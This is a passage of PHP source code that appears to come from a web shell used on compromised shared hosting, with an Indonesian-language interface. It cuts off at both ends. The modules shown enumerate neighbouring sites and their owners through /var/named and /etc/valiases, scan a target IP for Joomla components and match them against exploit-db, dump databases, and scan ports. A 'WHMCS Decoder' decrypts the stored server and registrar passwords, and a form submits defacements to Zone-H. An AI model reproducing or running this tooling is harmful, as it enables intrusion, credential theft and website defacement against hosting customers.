||
|
}
|
||
|
elseif ( $pilih == 'tutorial4') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_1.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial5') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_2.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial6') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_3.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial7') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_4.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial8') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_5.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial9') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_6.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial10') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_7.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial11') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode_magazine_8.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial12') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode9.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial13') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode10.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial14') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/xcode11.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial15') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/Xcode12.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial16') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/Xcode13.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial17') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/files/Xcode14.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial18') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/Xcode15.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial19') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_16.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial20') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_17.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial21') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_18.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial22') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_19.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial23') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_20.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial024') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://xcode.or.id/xcode_magazine_21.zip';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
|
||
|
elseif ( $pilih == 'tutorial24') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/hacking_exposed_5.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial25') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/internet_denial_of_service.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial26') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial27') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/hack_attacks_testing.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial28') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial29') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial30') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'ddd') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'tutorial31') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'cryptography_for_defeloper') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'forensic') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
elseif ( $pilih == 'metasploit') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}elseif ( $pilih == 'stealing_network') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}elseif ( $pilih == 'security_polices') {
|
||
|
?>
|
||
|
<script>
|
||
|
document.location = 'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
|
||
|
</script>
|
||
|
<?php
|
||
|
}
|
||
|
}
|
||
|
|
||
|
}
|
||
|
////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
|
||
|
<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>
|
||
|
<?php
|
||
|
if(!file_exists('pee.tmp')){
|
||
|
@fopen('pee.tmp', 'w');
|
||
|
|
||
|
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
|
||
|
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
|
||
|
|
||
|
$p = 0;
|
||
|
|
||
|
if(is_readable("/var/named")){
|
||
|
$list = scandir("/var/named");
|
||
|
$current_dir = posix_getcwd();
|
||
|
$dir = explode("/",$current_dir);
|
||
|
foreach($list as $domain){
|
||
|
if(strpos($domain,".db"))
|
||
|
{
|
||
|
$domain = str_replace('.db','',$domain);
|
||
|
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
|
||
|
|
||
|
error_reporting(0);
|
||
|
|
||
|
$link = $pageURL.'pee/'.$owner['name'];
|
||
|
|
||
|
cms_add($link,$domain,$owner['name'],"WordPress");
|
||
|
cms_add($link,$domain,$owner['name'],"Joomla");
|
||
|
cms_add($link,$domain,$owner['name'],"vBulletin");
|
||
|
cms_add($link,$domain,$owner['name'],"WHMCS");
|
||
|
cms_add($link,$domain,$owner['name'],"PhpBB");
|
||
|
cms_add($link,$domain,$owner['name'],"MyBB");
|
||
|
cms_add($link,$domain,$owner['name'],"IPB");
|
||
|
cms_add($link,$domain,$owner['name'],"SMF");
|
||
|
cms_add($link,$domain,$owner['name'],"Drupal");
|
||
|
cms_add($link,$domain,$owner['name'],"e107");
|
||
|
cms_add($link,$domain,$owner['name'],"Seditio");
|
||
|
cms_add($link,$domain,$owner['name'],"osCommerce");
|
||
|
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}else{
|
||
|
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
|
||
|
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
|
||
|
$content = file_get_contents($pageURL.'pee.tmp');
|
||
|
echo $content;
|
||
|
}
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'jss'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
|
||
|
<?php
|
||
|
echo '
|
||
|
|
||
|
<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
|
||
|
<form method="POST">
|
||
|
<p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
|
||
|
</form><center>
|
||
|
|
||
|
';
|
||
|
@set_time_limit(0);
|
||
|
@error_reporting(E_ALL | E_NOTICE);
|
||
|
|
||
|
function check_exploit($comxx){
|
||
|
|
||
|
$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
|
||
|
|
||
|
$result = @file_get_contents($link);
|
||
|
|
||
|
if (eregi("No results",$result)) {
|
||
|
|
||
|
echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>";
|
||
|
|
||
|
}else{
|
||
|
|
||
|
echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
|
||
|
|
||
|
}
|
||
|
}
|
||
|
|
||
|
function check_com($url){
|
||
|
|
||
|
$source = @file_get_contents($url);
|
||
|
|
||
|
preg_match_all('{option,(.*?)/}i',$source,$f);
|
||
|
preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
|
||
|
preg_match_all('{/components/(.*?)/}i',$source,$f3);
|
||
|
|
||
|
$arz=array_merge($f2[1],$f[1],$f3[1]);
|
||
|
|
||
|
$coms=array();
|
||
|
|
||
|
foreach(array_unique($arz) as $x){
|
||
|
$coms[]=$x;
|
||
|
}
|
||
|
|
||
|
foreach($coms as $comm){
|
||
|
|
||
|
echo "<tr><td>$comm</td>";
|
||
|
check_exploit($comm);
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
function sec($site){
|
||
|
preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
|
||
|
if(eregi("www",$sites[0][0])){
|
||
|
return $site=str_replace("index.php","",$sites[0][0]);
|
||
|
}else{
|
||
|
return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
|
||
|
}}
|
||
|
|
||
|
$npages = 50000;
|
||
|
|
||
|
if ($_POST)
|
||
|
{
|
||
|
$ip = trim(strip_tags($_POST['site']));
|
||
|
$npage = 1;
|
||
|
$allLinks = array();
|
||
|
|
||
|
|
||
|
while($npage <= $npages)
|
||
|
{
|
||
|
|
||
|
$x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
|
||
|
|
||
|
|
||
|
if ($x)
|
||
|
{
|
||
|
preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);
|
||
|
|
||
|
foreach ($findlink[1] as $fl)
|
||
|
|
||
|
$allLinks[]=sec($fl);
|
||
|
|
||
|
|
||
|
$npage = $npage + 10;
|
||
|
|
||
|
if (preg_match('(first=' . $npage . '&)siU', $x, $linksuiv) == 0)
|
||
|
break;
|
||
|
}
|
||
|
|
||
|
else
|
||
|
break;
|
||
|
}
|
||
|
|
||
|
|
||
|
$allDmns = array();
|
||
|
|
||
|
foreach ($allLinks as $kk => $vv){
|
||
|
|
||
|
$allDmns[] = $vv;
|
||
|
}
|
||
|
|
||
|
echo'<table border="1" width=\"80%\" align=\"center\">
|
||
|
<tr><td width=\"30%\"><b>Server IP : </b></td><td><b>'.$ip.'</b></td></tr>
|
||
|
<tr><td width=\"30%\"><b>Sites Found : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
|
||
|
</table>';
|
||
|
echo "<br><br>";
|
||
|
|
||
|
echo'<table border="1" width="80%" align=\"center\">';
|
||
|
|
||
|
foreach(array_unique($allDmns) as $h3h3){
|
||
|
|
||
|
echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';
|
||
|
|
||
|
check_com($h3h3);
|
||
|
|
||
|
}
|
||
|
|
||
|
echo"</table>";
|
||
|
|
||
|
}
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
|
||
|
<?php
|
||
|
echo $head.'<p align="center">';
|
||
|
echo '
|
||
|
<table width=371 class=tabnet >
|
||
|
<tr><th colspan="2">Database Dump</th></tr>
|
||
|
<tr>
|
||
|
<td>Server </td>
|
||
|
<td><input class="inputz" type=text name=server size=52></td></tr><tr>
|
||
|
<td>Username</td>
|
||
|
<td><input class="inputz" type=text name=username size=52></td></tr><tr>
|
||
|
<td>Password</td>
|
||
|
<td><input class="inputz" type=text name=password size=52></td></tr><tr>
|
||
|
<td>DataBase Name</td>
|
||
|
<td><input class="inputz" type=text name=dbname size=52></td></tr>
|
||
|
<tr>
|
||
|
<td>DB Type </td>
|
||
|
<td><form method=post action="'.$me.'">
|
||
|
<select class="inputz" name=method>
|
||
|
<option value="gzip">Gzip</option>
|
||
|
<option value="sql">Sql</option>
|
||
|
</select>
|
||
|
<input class="inputzbut" type=submit value=" Dump! " ></td></tr>
|
||
|
</form></center></table>';
|
||
|
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
|
||
|
$date = date("Y-m-d");
|
||
|
$dbserver = $_POST['server'];
|
||
|
$dbuser = $_POST['username'];
|
||
|
$dbpass = $_POST['password'];
|
||
|
$dbname = $_POST['dbname'];
|
||
|
$file = "Dump-$dbname-$date";
|
||
|
$method = $_POST['method'];
|
||
|
if ($method=='sql'){
|
||
|
$file="Dump-$dbname-$date.sql";
|
||
|
$fp=fopen($file,"w");
|
||
|
}else{
|
||
|
$file="Dump-$dbname-$date.sql.gz";
|
||
|
$fp = gzopen($file,"w");
|
||
|
}
|
||
|
function write($data) {
|
||
|
global $fp;
|
||
|
if ($_POST['method']=='ssql'){
|
||
|
fwrite($fp,$data);
|
||
|
}else{
|
||
|
gzwrite($fp, $data);
|
||
|
}}
|
||
|
mysql_connect ($dbserver, $dbuser, $dbpass);
|
||
|
mysql_select_db($dbname);
|
||
|
$tables = mysql_query ("SHOW TABLES");
|
||
|
while ($i = mysql_fetch_array($tables)) {
|
||
|
$i = $i['Tables_in_'.$dbname];
|
||
|
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
|
||
|
write($create['Create Table'].";\n\n");
|
||
|
$sql = mysql_query ("SELECT * FROM ".$i);
|
||
|
if (mysql_num_rows($sql)) {
|
||
|
while ($row = mysql_fetch_row($sql)) {
|
||
|
foreach ($row as $j => $k) {
|
||
|
$row[$j] = "'".mysql_escape_string($k)."'";
|
||
|
}
|
||
|
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
if ($method=='ssql'){
|
||
|
fclose ($fp);
|
||
|
}else{
|
||
|
gzclose($fp);}
|
||
|
header("Content-Disposition: attachment; filename=" . $file);
|
||
|
header("Content-Type: application/download");
|
||
|
header("Content-Length: " . filesize($file));
|
||
|
flush();
|
||
|
|
||
|
$fp = fopen($file, "r");
|
||
|
while (!feof($fp))
|
||
|
{
|
||
|
echo fread($fp, 65536);
|
||
|
flush();
|
||
|
}
|
||
|
fclose($fp);
|
||
|
}
|
||
|
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
|
||
|
<?php
|
||
|
echo '<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>';
|
||
|
$start = strip_tags($_POST['start']);
|
||
|
$end = strip_tags($_POST['end']);
|
||
|
$host = strip_tags($_POST['host']);
|
||
|
if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
|
||
|
for($i = $start; $i<=$end; $i++){
|
||
|
$fp = @fsockopen($host, $i, $errno, $errstr, 3);
|
||
|
if($fp){
|
||
|
echo 'Port '.$i.' is <font color=green>open</font><br>';
|
||
|
}
|
||
|
flush();
|
||
|
}
|
||
|
}else{
|
||
|
echo '<table class=tabnet style="width:300px;padding:0 1px;">
|
||
|
<input type="hidden" name="y" value="phptools">
|
||
|
<tr><th colspan="5">Port Scanner</th></center></tr>
|
||
|
<tr>
|
||
|
<td>Host</td>
|
||
|
<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>Port start</td>
|
||
|
<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
|
||
|
</tr>
|
||
|
<tr><td>Port end</td>
|
||
|
<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
|
||
|
</tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
|
||
|
</td></form></center></table>';
|
||
|
}
|
||
|
}
|
||
|
/////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
|
||
|
{
|
||
|
$submit= $_POST['enter'];
|
||
|
if (isset($submit)) {
|
||
|
$pass = $_POST['password']; // password
|
||
|
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
|
||
|
$hash = md5($pass); // md5 hash #1
|
||
|
$md4 = hash("md4",$pass);
|
||
|
$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
|
||
|
$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
|
||
|
$hash1 = sha1($pass); // sha1 hash #4
|
||
|
$sha256 = hash("sha256",$text);
|
||
|
$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
|
||
|
$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
|
||
|
}
|
||
|
echo '<form action="" method="post"><b><table class=tabnet>';
|
||
|
echo '<tr><th colspan="2">Password Hash</th></center></tr>';
|
||
|
echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
|
||
|
echo '<td><input class="inputz" type="text" name="password" size="40" />';
|
||
|
echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
|
||
|
echo '</td></tr><br>';
|
||
|
echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
|
||
|
echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
|
||
|
echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
|
||
|
echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
|
||
|
echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
|
||
|
echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
|
||
|
echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
|
||
|
echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
|
||
|
echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
|
||
|
echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
|
||
|
}
|
||
|
|
||
|
/////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=whmcs" method="post">
|
||
|
|
||
|
<?php
|
||
|
|
||
|
function decrypt ($string,$cc_encryption_hash)
|
||
|
{
|
||
|
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
|
||
|
$hash_key = _hash ($key);
|
||
|
$hash_length = strlen ($hash_key);
|
||
|
$string = base64_decode ($string);
|
||
|
$tmp_iv = substr ($string, 0, $hash_length);
|
||
|
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
|
||
|
$iv = $out = '';
|
||
|
$c = 0;
|
||
|
while ($c < $hash_length)
|
||
|
{
|
||
|
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
|
||
|
++$c;
|
||
|
}
|
||
|
$key = $iv;
|
||
|
$c = 0;
|
||
|
while ($c < strlen ($string))
|
||
|
{
|
||
|
if (($c != 0 AND $c % $hash_length == 0))
|
||
|
{
|
||
|
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
|
||
|
}
|
||
|
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
|
||
|
++$c;
|
||
|
}
|
||
|
return $out;
|
||
|
}
|
||
|
|
||
|
function _hash ($string)
|
||
|
{
|
||
|
if (function_exists ('sha1'))
|
||
|
{
|
||
|
$hash = sha1 ($string);
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$hash = md5 ($string);
|
||
|
}
|
||
|
$out = '';
|
||
|
$c = 0;
|
||
|
while ($c < strlen ($hash))
|
||
|
{
|
||
|
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
|
||
|
$c += 2;
|
||
|
}
|
||
|
return $out;
|
||
|
}
|
||
|
|
||
|
echo "
|
||
|
<br><center><font size='5' color='#00ff00'><b>-=[ WHMCS Decoder ]=-</b></font></center>
|
||
|
<center>
|
||
|
<br>
|
||
|
|
||
|
<FORM action='' method='post'>
|
||
|
<input type='hidden' name='form_action' value='2'>
|
||
|
<br>
|
||
|
<table class=tabnet style=width:320px;padding:0 1px;>
|
||
|
<tr><th colspan=2>WHMCS Decoder</th></tr>
|
||
|
<tr><td>db_host </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
|
||
|
<tr><td>db_username </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
|
||
|
<tr><td>db_password</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
|
||
|
<tr><td>db_name</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
|
||
|
<tr><td>cc_encryption_hash</td><td><input style='color:#00ff00;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
|
||
|
<td> <INPUT class='inputzbut' type='submit' style='color:#00ff00;background-color:' value='Submit' name='Submit'></td>
|
||
|
</table>
|
||
|
</FORM>
|
||
|
</center>
|
||
|
";
|
||
|
|
||
|
if($_POST['form_action'] == 2 )
|
||
|
{
|
||
|
//include($file);
|
||
|
$db_host=($_POST['db_host']);
|
||
|
$db_username=($_POST['db_username']);
|
||
|
$db_password=($_POST['db_password']);
|
||
|
$db_name=($_POST['db_name']);
|
||
|
$cc_encryption_hash=($_POST['cc_encryption_hash']);
|
||
|
|
||
|
|
||
|
|
||
|
$link=mysql_connect($db_host,$db_username,$db_password) ;
|
||
|
mysql_select_db($db_name,$link) ;
|
||
|
$query = mysql_query("SELECT * FROM tblservers");
|
||
|
while($v = mysql_fetch_array($query)) {
|
||
|
$ipaddress = $v['ipaddress'];
|
||
|
$username = $v['username'];
|
||
|
$type = $v['type'];
|
||
|
$active = $v['active'];
|
||
|
$hostname = $v['hostname'];
|
||
|
echo("<center><table border='1'>");
|
||
|
$password = decrypt ($v['password'], $cc_encryption_hash);
|
||
|
echo("<tr><td>Type</td><td>$type</td></tr>");
|
||
|
echo("<tr><td>Active</td><td>$active</td></tr>");
|
||
|
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
|
||
|
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
|
||
|
echo("<tr><td>Username</td><td>$username</td></tr>");
|
||
|
echo("<tr><td>Password</td><td>$password</td></tr>");
|
||
|
|
||
|
echo "</table><br><br></center>";
|
||
|
}
|
||
|
|
||
|
$link=mysql_connect($db_host,$db_username,$db_password) ;
|
||
|
mysql_select_db($db_name,$link) ;
|
||
|
$query = mysql_query("SELECT * FROM tblregistrars");
|
||
|
echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
|
||
|
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
|
||
|
while($v = mysql_fetch_array($query)) {
|
||
|
$registrar = $v['registrar'];
|
||
|
$setting = $v['setting'];
|
||
|
$value = decrypt ($v['value'], $cc_encryption_hash);
|
||
|
if ($value=="") {
|
||
|
$value=0;
|
||
|
}
|
||
|
$password = decrypt ($v['password'], $cc_encryption_hash);
|
||
|
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=zone" method="post">
|
||
|
|
||
|
<br><br><center>
|
||
|
<!-- Zone-H -->
|
||
|
<form action="" method='POST'><table><table class='tabnet'><tr>
|
||
|
<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
|
||
|
<input type="text" class="inputz" name="defacer" value="Nama Defacer" />
|
||
|
<select name="hackmode" class="inputz" >
|
||
|
<option >------------------------Pilih Salah Satu------------------------</option>
|
||
|
<option value="1">known vulnerability (i.e. unpatched system)</option>
|
||
|
<option value="2" >undisclosed (new) vulnerability</option>
|
||
|
<option value="3" >configuration / admin. mistake</option>
|
||
|
<option value="4" >brute force attack</option>
|
||
|
<option value="5" >social engineering</option>
|
||
|
<option value="6" >Web Server intrusion</option>
|
||
|
<option value="7" >Web Server external module intrusion</option>
|
||
|
<option value="8" >Mail Server intrusion</option>
|
||
|
<option value="9" >FTP Server intrusion</option>
|
||
|
<option value="10" >SSH Server intrusion</option>
|
||
|
<option value="11" >Telnet Server intrusion</option>
|
||
|
<option value="12" >RPC Server intrusion</option>
|
||
|
<option value="13" >Shares misconfiguration</option>
|
||
|
<option value="14" >Other Server intrusion</option>
|
||
|
<option value="15" >SQL Injection</option>
|
||
|
<option value="16" >URL Poisoning</option>
|
||
|
<option value="17" >File Inclusion</option>
|
||
|
<option value="18" >Other Web Application bug</option>
|
||
|
<option value="19" >Remote administrative panel access bruteforcing</option>
|
||
|
<option value="20" >Remote administrative panel access password guessing</option>
|
||
|
<option value="21" >Remote administrative panel access social engineering</option>
|
||
|
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
